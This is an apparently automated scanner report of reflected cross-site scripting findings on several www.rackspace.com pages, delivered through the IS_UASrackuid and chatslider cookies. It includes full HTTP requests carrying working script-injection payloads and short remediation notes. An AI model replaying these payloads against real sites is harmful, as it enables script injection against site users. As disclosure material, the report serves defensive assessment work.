Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D37bb1"%3balert(1)//adfb6867553; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ad6"><script>alert(1)</script>80354848cdb was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f9ad6"><script>alert(1)</script>80354848cdb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa36e"%3balert(1)//22deff37187 was submitted in the IS_UASrackuid cookie. This input was echoed as fa36e";alert(1)//22deff37187 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fa36e"%3balert(1)//22deff37187; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e18"><script>alert(1)</script>ce7f3ffd4c4 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df0e18"><script>alert(1)</script>ce7f3ffd4c4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82732"%3balert(1)//fd3162fa4ba was submitted in the chatslider cookie. This input was echoed as 82732";alert(1)//fd3162fa4ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D82732"%3balert(1)//fd3162fa4ba; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe2"><script>alert(1)</script>970c3f8f90c was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86cbe2"><script>alert(1)</script>970c3f8f90c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25e72"%3balert(1)//f54b9ea5589 was submitted in the IS_UASrackuid cookie. This input was echoed as 25e72";alert(1)//f54b9ea5589 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f825e72"%3balert(1)//f54b9ea5589; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c34"><script>alert(1)</script>fbfbc9a1925 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da4c34"><script>alert(1)</script>fbfbc9a1925; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 496a2"%3balert(1)//c8dcf4a1dcd was submitted in the chatslider cookie. This input was echoed as 496a2";alert(1)//c8dcf4a1dcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/links.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D496a2"%3balert(1)//c8dcf4a1dcd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b60f</script><script>alert(1)</script>590259cb859 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/release.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d8b60f</script><script>alert(1)</script>590259cb859; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2ecf"><script>alert(1)</script>3beed6b57a was submitted in the IS_UASrackuid cookie. This input was echoed as a2ecf\"><script>alert(1)</script>3beed6b57a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/release.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41da2ecf"><script>alert(1)</script>3beed6b57a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1587b"><script>alert(1)</script>ff408ef8b5c was submitted in the chatslider cookie. This input was echoed as 1587b\"><script>alert(1)</script>ff408ef8b5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/release.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A1587b"><script>alert(1)</script>ff408ef8b5c; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9940b</script><script>alert(1)</script>005710106ab was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/release.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A9940b</script><script>alert(1)</script>005710106ab; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f78"><script>alert(1)</script>2d685035c6a was submitted in the IS_UASrackuid cookie. This input was echoed as 36f78\"><script>alert(1)</script>2d685035c6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
